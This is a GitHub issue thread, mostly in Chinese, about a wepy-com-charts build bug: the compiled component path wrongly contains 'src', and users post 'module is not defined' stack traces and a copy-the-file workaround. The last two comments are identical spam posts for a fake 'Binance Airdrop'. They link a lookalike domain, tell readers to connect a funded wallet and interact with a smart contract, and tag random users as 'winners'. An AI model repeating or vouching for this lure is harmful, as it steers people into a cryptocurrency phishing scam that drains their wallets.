### ISSUE TITLE
编译问题

### ISSUE THREAD

**Issue by ppishero** [CalvinHong/wepy-com-charts#3]
使用wepy build后，控件的路径为'./../npm/wepy-com-charts/src/line-chart.js'，
但是实际上路径为'./../npm/wepy-com-charts/line-chart.js'

是我使用的问题么

**Comment by whkendny** [comment]
同问

**Comment by sannyzeng** [comment]
我也遇到这个问题，不过我把 src 目录里面的 line-chart.wpy 拷贝出来，在项目中直接引用就可以用了
![image](https://user-images.githubusercontent.com/8219610/37143132-2c17c734-22f5-11e8-98f0-025d4bf1482c.png)
其他和例子的一样，然后就出来了

**Comment by Licoy** [comment]
thirdScriptError 
 sdk uncaught third Error 
 module "npm/wepy-com-charts/src/line-chart.js" is not defined 
 Error: module "npm/wepy-com-charts/src/line-chart.js" is not defined
    at require (http://127.0.0.1:58480/appservice/__dev__/WAService.js:18:16147)
    at http://127.0.0.1:58480/appservice/__dev__/WAService.js:18:16002
    at http://127.0.0.1:58480/appservice/pages/data.js:13:22
    at require (http://127.0.0.1:58480/appservice/__dev__/WAService.js:18:16253)
    at http://127.0.0.1:58480/appservice/appservice:1210:9

**Comment by zhanglin-doudou** [comment]
与楼上同样的问题...

```
thirdScriptError 
 sdk uncaught third Error 
 module "npm/wepy-com-charts/src/line-chart.js" is not defined 
 Error: module "npm/wepy-com-charts/src/line-chart.js" is not defined
    at require (http://127.0.0.1:59020/appservice/__dev__/WAService.js:18:20864)
    at http://127.0.0.1:59020/appservice/__dev__/WAService.js:18:20719
    at http://127.0.0.1:59020/appservice/pages/index.js:1:1931
    at require (http://127.0.0.1:59020/appservice/__dev__/WAService.js:18:20970)
    at http://127.0.0.1:59020/appservice/appservice:1148:9
```

**Comment by mkproject-admin** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @swcho, @sanyinchen, @iBasit, @marcus-grant, @michalhlavka, @MagicMolly, @darioblanco

**Comment by mkproject-admin** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @arest, @marcosrioj, @chnthkksn, @Valerian1234, @lukeharvey, @redline187, @davieds
